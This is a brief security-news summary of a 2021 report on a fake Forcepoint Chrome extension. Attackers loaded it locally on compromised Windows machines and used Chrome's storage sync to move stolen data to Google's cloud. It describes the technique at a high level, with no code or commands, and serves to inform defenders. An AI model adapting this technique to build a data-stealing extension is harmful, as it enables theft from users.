Security News > 2021 > February > Fake Forcepoint Google Chrome Extension Hacks Windows Users

Cybercriminals have been using a novel approach to exfiltrate data that involves directly injecting malicious Google Chrome extensions onto victims' Windows machines via the abuse of Google's cloud synching function.

The malicious add-on is disguised as a "Forcepoint Endpoint Chrome Extension for Windows," with the attackers using the security company's logo to enhance an air of legitimacy.

The threat actors "Dropped the extension locally in a folder and loaded it directly from Chrome on a compromised workstation," explained Zdrnja, in an analysis late last week.

Next, a permissions parameter specified that the extension can use the storage API. And finally, the background parameter specifies JavaScript files that will run when extension is loaded.

The authors of the malicious Forcepoint add-on were able to steal information from users' internal extensions thanks to setting up a behind-the-scenes "Chat" between the malicious extension and other web apps.

The extension also uses the "Chrome.storage.sync.get" and "Chrome.storage.sync.save" methods, so that all these values will be automatically synced to Google's cloud by Chrome, under the context of the user being logged in in Chrome.

News URL

https://threatpost.com/fake-forcepoint-google-chrome-extension-hacks/163728/